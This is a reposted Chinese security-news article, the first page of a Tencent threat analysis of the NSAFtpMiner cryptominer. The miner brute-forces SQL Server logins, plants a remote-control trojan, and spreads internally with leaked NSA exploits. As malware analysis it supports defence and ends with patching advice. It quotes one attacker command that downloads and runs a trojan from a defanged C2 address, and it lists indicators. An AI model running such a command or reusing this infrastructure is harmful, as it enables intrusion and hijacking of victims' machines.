>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网 | xxx>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网 – xxx
菜单

>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网

九月 10, 2018 - 黑吧安全网

精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招

来源:本站整理 作者:佚名 时间:2018-09-10 TAG: 我要投稿

0×1 概述
腾讯御见威胁情报中心近期发现黑客通过1433端口爆破入侵SQL Server服务器,再植入远程控制木马并安装为系统服务,然后利用远程控制木马进一步加载挖矿木马进行挖矿。随后,黑客还会下载NSA武器攻击工具在内网中攻击扩散,若攻击成功,会继续在内网机器上安装该远程控制木马。
木马加载的攻击模块几乎使用了NSA武器库中的十八般武器:
Eternalblue(永恒之蓝)、Doubleplsar(双脉冲星)、EternalChampion(永恒冠军)、Eternalromance(永恒浪漫)、Esteemaudit(RDP漏洞攻击)等漏洞攻击工具均被用来进行内网攻击,攻击主进程伪装成“Ftp系统核心服务”,还会利用FTP功能进行内网文件更新。其攻击内网机器后,植入远程控制木马,并继续从C2地址下载挖矿和攻击模块,进行内网扩散感染。
根据以上攻击特点,腾讯御见威胁情报中心将其命名为1433爆破手矿工(NSAFtpMiner)。最新监测数据统计表明,1433爆破手矿工(NSAFtpMiner)已累计感染约3万台电脑。
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
NSAFtpMiner攻击流程
1433爆破手矿工(NSAFtpMiner)有如下特点:
1.利用密码字典爆破1433端口登录;
2.木马伪装成系统服务,COPY自身到c:/windows/svchost.exe,创建服务“Server Remote”;
3.利用NSA武器库工具包扫描入侵内网开放445/139端口的计算机;
4.使用了NSA武器中的多个工具包Eternalblue(永恒之蓝)、Doubleplsar(双脉冲星)、EternalChampion(永恒冠军)、Eternalromance(永恒浪漫)、Esteemaudit(RDP漏洞攻击);
5.远程控制木马创建“FTP系统核心服务”,提供FTP服务,供内网其他被入侵的电脑进行病毒库更新;
6.下载挖矿程序在局域网组网挖取门罗币;
7.累计感染近3万台电脑,广东、浙江、江苏中招电脑位于全国前三位。
令人吃惊的是,早在2017年3月方程式黑客组织就已公开NSA工具包,但在一年半之后,仍有大量企业未修复这些高危漏洞。1433爆破手矿工(NSAFtpMiner)此轮攻击只是为了挖矿获利,而实际上,黑客攻击成功,已获得系统完全控制权。窃取机密信息、利用中毒电脑攻击其他电脑、在内网植入勒索病毒彻底瘫痪网络等巨大风险均有可能出现。
腾讯御见威胁情报中心再次呼吁,企业网管应立刻采取行动,对系统高危漏洞进行修补。立刻纠正Web服务器使用弱密码,以保护企业信息系统不被入侵破坏。
以下为详细的技术分析报告。
0×2 详细分析
0×2.1 入侵
1433端口SQL Server默认端口,用于供SQL Server对外提供服务。黑客们利用sa弱口令,通过密码字典进行猜解爆破登录。由于一些管理员的安全意识薄弱,设置密码简单容易猜解,导致黑客往往能轻松进入服务器。
黑客针对1433端口爆破成功后在受害机器执行命令:
"C:/Windows/System32/WScript.exe" "C:/ProgramData/vget.vbs" hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe
将远程控制木马植入。
clem.exe运行后拷贝自身到C:/windows/svchost.exe,并创建服务“Server Remote”。
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
动态获取函数地址:
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
连接C2地址221.229.204.120:
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
发送数据:
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
接收数据:
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
根据远程命令执行相应代码:
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
0×2.2 NSA武器攻击
远程控制木马clem.exe接收指令下载NSA攻击模块主程序ru.exe,ru.exe运行后在C:/Program Files/Windowsd 释放72个子文件。
>精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招-网络安全-黑吧安全网
黑客攻击时先关闭防火墙,然后启动Fileftp.exe扫描内网机器的445/139端口,如果端口处于打开状态则利用多个NSA武器工具(Eternalblue等)对目标机器进行攻击。若攻击成功,则根据不同系统版本在受害机器上执行payload(x86/x64.dll),x86/x64.dll执行后释放出runsum.exe并安装执行,runsum.exe功能同最初的远程控制模块clem.exe相同,接收指令下载挖矿模块和NSA攻击模块进行挖矿攻击和继续感染。
如果内网机器开放有445/139端口且未安装SMB漏洞相关补丁(ms17-010),则很容易造成批量感染。

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。

上一篇:Python Subprocess库在使用中可能存在的安全风险总结返回黑吧安全网首页】【进入黑吧技术论坛
下一篇:利用Office文档结合社会工程学手段欺骗用户执行恶意代码


Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51